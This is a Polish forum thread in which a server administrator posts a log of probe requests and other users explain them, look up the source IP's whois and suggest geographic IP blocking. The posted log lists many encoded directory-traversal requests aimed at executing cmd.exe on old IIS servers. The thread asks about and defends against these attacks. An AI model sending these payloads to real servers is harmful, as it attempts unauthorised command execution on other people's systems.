douglasmclloyd Napisano Lipiec 27, 2007 Zgłoszenie Share Napisano Lipiec 27, 2007 Codziennie jakieś dziady próbują mi się włamać do servera. Ostatnio w logu znalazłem coś takiego. Czy ktoś wie co te ku... próbują zrobić? A total of 1 sites probed the server 24.12.183.239 Requests with error response codes 400 Bad Request /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir: 1 Time(s) 404 Not Found /MSADC/root.exe?/c+dir: 1 Time(s) /_mem_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s) /_vti_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s) /c/winnt/system32/cmd.exe?/c+dir: 1 Time(s) /d/winnt/system32/cmd.exe?/c+dir: 1 Time(s) /favicon.ico: 3 Time(s) /msadc/..%255c../..%255c../..%255c/..%c1%1 ... /cmd.exe?/c+dir: 1 Time(s) /robots.txt: 61 Time(s) /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%252f../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%255c../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir: 1 Time(s) /scripts/root.exe?/c+dir: 1 Time(s) /tmp: 1 Time(s) Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
tex_ass Napisano Lipiec 27, 2007 Zgłoszenie Share Napisano Lipiec 27, 2007 Chyba jakieś >>dziecko neostrady<< próbuje włamać się do ciebie na serwer zapomocą czegoś przeznaczonego do hakowania M$ Windows. pozdrawiam Poprawka: jakiś dzieciak ze Stanów (amerykański odpowiednik >>dziecka neostrady<< :\). To mi wywaliła baza whois: [Wysyłam zapytanie do whois.arin.net] [whois.arin.net] Comcast Cable Communications, Inc. EASTERNSHORE-1 (NET-24-0-0-0-1) 24.0.0.0 - 24.15.255.255 Comcast Cable Communications ILLINOIS-14 (NET-24-12-0-0-1) 24.12.0.0 - 24.15.255.255 # ARIN WHOIS database, last updated 2007-07-26 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@perl Napisano Sierpień 5, 2007 Zgłoszenie Share Napisano Sierpień 5, 2007 jezeli jest to serwer webowy przeznaczony dla Polaków ewentualnie Europejczyków, zablokowałbym na firewallu całe pule adresowe z Stanów, Chin, Rosji i Bliskiego Wschodu (czyli 90% ataków/skoanowania portów itp.) Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@Sorror Napisano Sierpień 9, 2007 Zgłoszenie Share Napisano Sierpień 9, 2007 Mod_geoip i zablokować tylko jego miejscowość ;-) Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się